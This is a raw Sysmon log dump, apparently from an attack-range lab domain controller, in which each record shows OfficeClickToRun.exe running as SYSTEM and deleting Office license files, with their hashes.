23542300x800000000000000067524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-phn.xrm-msMD5=5BBF8F599B0AB83D22340C0C6709400F,SHA256=D95632C1D787BB1F59526BC07E93B60064AB45861A4BFE910BCDE4F8C4B21DE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-oob.xrm-msMD5=0082B275431181319EA634B579F88605,SHA256=93FF3AA257C8F1575AD6BBCFB021AA8A12518159912E3178AB7083C4F946408C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalPipcR_OEM_Perp-ppd.xrm-msMD5=1B7CF87E29A0F212B7ACD38F175F86B2,SHA256=D1533499771EBB862C6403FF24F5082D32D351A407A27495DAA03507DD155DAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalPipcR_OEM_Perp-pl.xrm-msMD5=BBF4BF3679EF1790DC1DF1ACAD6B9780,SHA256=15CB0B56A2E5599B3EC6E7401C0C2DD32DE51024B498705DF00337E5FC01917A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalPipcR_Grace-ul-oob.xrm-msMD5=8D74B88A4E7FE51B73C44541A6399240,SHA256=D37B820FA0D3D8C9444767C42F35E4D8C4D5F3ECBE49216D82E303733D4F0424,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalPipcR_Grace-ppd.xrm-msMD5=76AD3741D6E5994F4043BCED5E693236,SHA256=A75C58B57B0CFD723944BD5D6E8CED025DD04F28DF1A131DEAB44F86CA93287C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-msMD5=0A160EC4A32AA739591EA1AB54771CDE,SHA256=E966ECA6A24704D4EA13F8BBF3C5EDB0FCDFB4558ECADD78167AA47547E8755F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\ProfessionalDemoR_BypassTrial180-ppd.xrm-msMD5=0FD6DB695E2323F87915D6D91911212F,SHA256=581333EF55437A62CE44266AB17CD673FF2E7D393535C99DB7F721F79417495B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_Trial-ul-oob.xrm-msMD5=2A1C4B3852A651374012BC9E4F371F00,SHA256=260E8A244489D7789CE254A6D53BF2DC96BDE3BD5066431A7AEC3C55602C36B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_Trial-ppd.xrm-msMD5=CD0993DEADA2131C186CBA73CA5B4421,SHA256=18F687DC10D0DC28D3AD8EB7EDF1B5A75EE6200F74A0253A9B467F170F2BDE90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_Trial-pl.xrm-msMD5=0AB20388CE1BD35DAE6926731ED07C67,SHA256=83EA6D29373F792E89A93D3F9646C28B49B35DA521D23A0E2DEC7C7B317C6F6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_Retail-ul-phn.xrm-msMD5=1191C70D26C2A23EEA2DDFD3AC3A6EE0,SHA256=246E6A2D70A17ED3AC0A5AE3B52B93D90D54C7351118303C3CFDBF8A3450C739,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_Retail-ul-oob.xrm-msMD5=FCC46AE7DE572FBBF50F581246ABB64D,SHA256=D35C8A681248F36390019622A4F8BBE054426D13109F62B35CFFE4021FB2DDE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_Retail-ppd.xrm-msMD5=1E5B8F037A5ED04EFADD863AAC9AAAA0,SHA256=767F8EF6B089C8C2BA70C2AC9905E43590FA8971B7EC59AD1E3B41E22F10725E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_Retail-pl.xrm-msMD5=043818FDD0BA1A9F100C61A48B687675,SHA256=A3B1A93501C22E64BCC6B00A80DF7BB454AF13946D59A8D8CA16D32375F02402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_PrepidBypass-ul-oob.xrm-msMD5=59F7D0202016CC48AE7D9CFE671ABF22,SHA256=13F7AC234660FDD5D5120AE400A4798A74175EAAFEF9EB9F3836E625661760D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_PrepidBypass-ppd.xrm-msMD5=ED18091794C5FB913E53D71E37E8003B,SHA256=147D7833544302DE8E979A5D960765C309185029CFF19D453ABD4BCFC08EE920,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_OEM_Perp-ul-phn.xrm-msMD5=D2FD829FA32998661CD66E9CB3ABF5FB,SHA256=4B90202034814CAA977AB8993155AC27940AA2B89AADA6232E505CDFEFFFA31F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_OEM_Perp-ul-oob.xrm-msMD5=0DE950F4C990B9D79B65B6D220283298,SHA256=8A9563DC4D10993D5F5D3E9709DF4B468996535616B5D524DCF5D46C0A161C97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_OEM_Perp-ppd.xrm-msMD5=04396182DD9703E867960D2AFFA98A7A,SHA256=7306C2C6C29CB8AFEC4AB409A920672DE1E2C2F33575118166CBDCE334B69827,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_OEM_Perp-pl.xrm-msMD5=E22E6D6AF6C88EADF75D9BD5968CE258,SHA256=B9D483E4936B4C64148C4C38EBD3FED75801483B27BEE35D733F96FF5656D929,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_Grace-ul-oob.xrm-msMD5=D0F9E44CBCA6183F063A3FBB5E54CFC8,SHA256=E0FFFF252EC57BAB54DAF81EE076174F7E0A82ED316C949FCB50DCED6309E016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019R_Grace-ppd.xrm-msMD5=8C8029B82B557C66AE488EAF59EDEDF1,SHA256=57A9638DA4F33200196BE1D0FB27CC1FDD7DEB420D7356C3391AB22134C306F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019DemoR_BypassTrial180-ul-oob.xrm-msMD5=1391E768DF5B2A60945CD4E5829D0589,SHA256=74D95336BA0D9D3392CEFB23AAAA9C074A68156B3D983E846029AC88DF77CC29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Professional2019DemoR_BypassTrial180-ppd.xrm-msMD5=0537A4551F034B996ECFBEC3A2BF8692,SHA256=ACBB8B84EDA21E7A7F3E5EAB581DC5D1B1CE0272DA0022760901A05703DA6D19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-msMD5=4D8882E0866BCC3F89E4C9CE141E1F65,SHA256=34B6DC76F9E3FAEA3417BC4C1B12FCB2C1919C85BF86CFF8A9D0D06E2085FB9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointVL_MAK-ul-oob.xrm-msMD5=B85A15862EB26F94558D612D0E0ED888,SHA256=326855D2B0A7C03EB30B6582CFEFBB19F7D1FA65E94B58036C3E84375A111AAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointVL_MAK-ppd.xrm-msMD5=83D0CA64D6BF869FFE2B56D10B2A32AA,SHA256=47573A453DFC65B02980AA191927C61DABF2818F2F9111137CF07EE572824CA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointVL_MAK-pl.xrm-msMD5=5C84531404C8318B1E51344228E1F035,SHA256=3FB65785DD89AC831E49CEE504B575A9E20B09308F8665B825B33DA76393CCFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointVL_KMS_Client-ul.xrm-msMD5=A765D072CC5D7B17A3543F92BFAB36C0,SHA256=74CAC1A8AA5BAA57731BCB516CDA3B95823392E8B5B70358529FE29BFC452167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointVL_KMS_Client-ul-oob.xrm-msMD5=E5ED6993DD88ECA1AE7DB2FEB21BC5DB,SHA256=A9C1E21B6AD4791E27D51F824E3C1C8D21FAF8BEC4D1D6A04C52B7239584D357,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointVL_KMS_Client-ppd.xrm-msMD5=9FA91C7ECA45E5B19D57F594713522F8,SHA256=2D72D14822432E9CB8082B2DDC78EB64D58668E4A6E5F4B60B79E20BB52F10B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_Trial-ul-oob.xrm-msMD5=0164D2AFF9BE6F6D197731ADE2082ECC,SHA256=2178872A266A4D1C4195A80EDC71485DCDDEB579EC7EF3011465CAECB95A5937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_Trial-ppd.xrm-msMD5=3A78EFC7E261A6F9FDB6C3519F6CF083,SHA256=895F4C994B44C0109F82EFEB8E2A763170CFECD1F98B5478C8FBCFD35A5DC854,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_Trial-pl.xrm-msMD5=638D0A0B33AF51FEFBFFD2E6A6FC7E9C,SHA256=C8321693B0CF5428D7FBB48B2205A94FAA412EBB9AAF9A592367A3799E2C5A96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_Retail-ul-phn.xrm-msMD5=AB86770E8B8D4B3464ED766FF4558D16,SHA256=19A32D3DCD74D0D06C85F44B3792FCF751A72467121CA2FC0905ABD000B94732,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_Retail-ul-oob.xrm-msMD5=F1C775C2269E5A8C0DF53139175F8E73,SHA256=039AF3B64CAAA37CECBA5659E28A4454EFA68ED0E8B8672790F3B3D0C1B7678A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_Retail-ppd.xrm-msMD5=C93BA7B82DEB80EAC2ECB3B3BAA3122A,SHA256=707B5BA68F244004A2ED65CA116372D30BD66A2A04A188DCD583633B00F285A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_Retail-pl.xrm-msMD5=B03842F846F4E8B11071779F537449D9,SHA256=E42E25D7899DB780B240148D122D485765CF929C1258BCAF1A25BC20ADB8236B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_OEM_Perp-ul-phn.xrm-msMD5=5A18F396672D173F3641688C35EA0934,SHA256=7AF9F28E24D41579ECCA6EDCCC0F6AEEAC4FF77C5D1E467A516A0003DA5D8A27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_OEM_Perp-ul-oob.xrm-msMD5=B86C161210B52AB473CD3ADDB477BFAE,SHA256=E5D337A05976565527FA3E06DF3F1888447822D9CBB2079154042596BE50DC46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_OEM_Perp-ppd.xrm-msMD5=817EBD45126D1E85FCDA0A52663DDBDD,SHA256=018A348FA657EB9FE137A052F16DFCBFB099C5D9E502FF5DE255D62ED6EB70D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\PowerPointR_OEM_Perp-pl.xrm-msMD5=848514CB3A0EC43632FB320D28C4CAA7,SHA256=B45115699CB6F6D670FAE83690BA07653F9F1F33834DC570ECF45485E1DAE54A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:14.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 